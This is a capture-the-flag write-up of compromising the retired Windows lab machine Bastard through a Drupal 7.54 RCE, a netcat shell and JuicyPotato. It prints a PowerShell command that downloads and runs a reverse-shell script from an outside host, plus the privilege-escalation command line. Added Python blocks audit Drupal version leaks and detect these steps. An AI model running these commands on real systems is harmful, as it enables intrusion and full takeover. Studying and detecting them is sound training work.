Bastard is a retired Windows machine. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to identify the target and its exposed services.
Classic scan
Full port scan
The port scan shows three open ports: 80/tcp (http, IIS httpd 7.5), 135/tcp (msrpc, Windows RPC) and 49154/tcp (msrpc, Windows RPC).
We enumerate port 80.
We find a Drupal CMS with an admin login. We tried default passwords without success. Checking the results given by Nmap, we saw that /CHANGELOG.txt is readable and discloses the version number.
It is 7.54, so let's see whether that version has a known vulnerability.
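The version leak above is the defender-side lesson of this step: Drupal 7 ships several plain-text files in the web root, and a readable CHANGELOG.txt hands out the exact core version. The following added check is not part of the write-up; it parses the changelog's release headers, reports which of those files a site serves, and flags a version below a threshold. The file list and the changelog format are assumptions about Drupal 7, the threshold MIN_ACCEPTED is a placeholder, and the sample site and changelog text are constructed.

```python
import re
import urllib.error
import urllib.request

# Drupal 7 ships these plain-text files in the web root; leaving them readable
# discloses the exact core version (CHANGELOG.txt) and the install layout.
DRUPAL_DISCLOSURE_FILES = [
    "CHANGELOG.txt", "README.txt", "INSTALL.txt",
    "UPGRADE.txt", "MAINTAINERS.txt", "LICENSE.txt",
]

# Release headers in Drupal 7's CHANGELOG.txt look like "Drupal 7.54, 2017-02-01";
# the newest release is listed first, so the first match is the installed version.
_RELEASE_LINE = re.compile(r"^Drupal (\d+)\.(\d+),", re.MULTILINE)


def parse_drupal_version(changelog_text):
    """Return (major, minor) of the newest release in the changelog, or None."""
    m = _RELEASE_LINE.search(changelog_text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def audit_drupal_disclosure(fetch, min_version):
    """fetch(path) -> (http_status, body_text). Reports which disclosure files
    are served and whether the disclosed core version is below min_version."""
    exposed, version = [], None
    for name in DRUPAL_DISCLOSURE_FILES:
        status, body = fetch("/" + name)
        if status == 200:
            exposed.append(name)
            if name == "CHANGELOG.txt":
                version = parse_drupal_version(body)
    return {
        "exposed_files": exposed,
        "version": version,
        "outdated": version is not None and version < min_version,
    }


def http_fetch(base_url, timeout=5):
    """Build a fetch() for a live site you own (hypothetical helper, not run offline)."""
    def fetch(path):
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=timeout) as r:
                return r.status, r.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            return e.code, ""
    return fetch


# Constructed sample changelog in the Drupal 7 layout, with 7.54 newest as on
# the target; the entry text and dates are made up.
SAMPLE_CHANGELOG = """Drupal 7.54, 2017-02-01
-----------------------
- (constructed entry)

Drupal 7.53, 2016-12-07
-----------------------
- (constructed entry)
"""

# Constructed site: serves CHANGELOG.txt and README.txt, 404s everything else.
SAMPLE_SITE = {"/CHANGELOG.txt": (200, SAMPLE_CHANGELOG), "/README.txt": (200, "README")}

# Placeholder threshold, not a value from the page: set it to the oldest core
# release your patch policy still accepts.
MIN_ACCEPTED = (7, 58)


def sample_fetch(path):
    return SAMPLE_SITE.get(path, (404, ""))


def run_sample():
    return audit_drupal_disclosure(sample_fetch, MIN_ACCEPTED)


if __name__ == "__main__":
    print(run_sample())
```

The fix on the server side is to deny web access to these files (or delete them after install) and to keep core current; the audit gives you a repeatable way to confirm both.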
Searchsploit finds the following.
There is an RCE vulnerability. We prefer the unauthenticated exploit, since we still haven't found any credentials.
I first try this exploit from my own machine.
We edited this line to suit our setup.
But when we tried to run the exploit, we got an error.
Let's search GitHub for another exploit.
We downloaded this one and used it.
Having seen its usage, let's run it against the target.
Here we were able to run the whoami command.
Now let's try to upload and run nc to get an interactive shell.
We've transferred nc to the target.
Then we ran nc.exe and it gave us a shell.
Here we obtained the user flag, but we cannot access the Administrator folder.
Here we enumerate the local system to find a path to the root flag.
We see that JuicyPotato applies here.
We transfer JuicyPotato.exe and Shell.bat to the target machine.
Shell.bat contains: powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1')"
We write the file.
Then we transfer it to the target.
Then we run JuicyPotato.exe:
.\JuicyPotato.exe -t * -p shell.bat -l 5555 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
We run this, and a shell connects back on port 4723, where we are listening with nc.
Now we get the root flag.
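Seen from the blue side, this chain leaves three distinct process-creation signals: the IIS worker (w3wp.exe) spawning a shell or nc.exe, a PowerShell download cradle of the kind placed in Shell.bat, and a JuicyPotato-style command line pairing a CLSID (-c) with a program to launch (-p). The detection logic below is an added example and not part of the write-up; it runs those three rules over constructed process-creation records modelled on the steps above. The worker and child process lists, the field names and the sample records are assumptions; the JuicyPotato command line and the cradle are the ones shown on this page.

```python
import re

# A web-server worker has no reason to spawn a shell or a network tool; on
# IIS the Drupal PHP code runs under w3wp.exe, so an RCE surfaces there.
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe"}
SUSPECT_CHILDREN = {"cmd.exe", "powershell.exe", "nc.exe", "certutil.exe"}

# PowerShell download-and-execute cradle of the kind used in Shell.bat.
DOWNLOAD_CRADLE = re.compile(r"IEX\s*\(.*DownloadString\s*\(", re.IGNORECASE)

# JuicyPotato-style invocation: a CLSID given with -c plus a program given with -p.
POTATO_CLSID = re.compile(
    r"-c\s*\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.IGNORECASE)
POTATO_PROGRAM = re.compile(r"-p\s+\S+")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(ev):
    """ev: process-creation record with keys image, parent_image, command_line.
    Returns the names of the rules that fire (empty list for a benign event)."""
    image, parent = _basename(ev["image"]), _basename(ev["parent_image"])
    cmd = ev["command_line"]
    hits = []
    if parent in WEB_WORKERS and image in SUSPECT_CHILDREN:
        hits.append("web_worker_spawned_shell")
    if DOWNLOAD_CRADLE.search(cmd):
        hits.append("powershell_download_cradle")
    if POTATO_CLSID.search(cmd) and POTATO_PROGRAM.search(cmd):
        hits.append("potato_style_com_abuse")
    return hits


def scan_events(events):
    """Return (image, rule names) for every event that triggers at least one rule."""
    findings = []
    for ev in events:
        hits = classify_event(ev)
        if hits:
            findings.append((_basename(ev["image"]), hits))
    return findings


# Constructed records modelled on the chain in the write-up; paths and the nc
# arguments are placeholders, not captured logs.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "command_line": "cmd.exe /c whoami"},
    {"image": r"C:\inetpub\wwwroot\nc.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "command_line": "nc.exe (arguments omitted)"},
    {"image": r"C:\inetpub\wwwroot\JuicyPotato.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r".\JuicyPotato.exe -t * -p shell.bat -l 5555 "
                     "-c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell \"IEX (New-Object Net.WebClient).DownloadString("
                     "'http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1')\""},
    {"image": r"C:\Windows\System32\svchost.exe",          # benign control record
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": "svchost.exe -k netsvcs"},
]


if __name__ == "__main__":
    for image, rules in scan_events(SAMPLE_EVENTS):
        print(image, "->", ", ".join(rules))
```

The first rule is the one worth wiring up for real: an IIS application pool that spawns cmd.exe is almost never legitimate, and it fires at the whoami step, before any tooling is uploaded. On the hardening side, JuicyPotato needs the compromised account to hold SeImpersonatePrivilege, which IIS application pool identities have by default, so reviewing which service accounts really need that privilege is the corresponding preventive check.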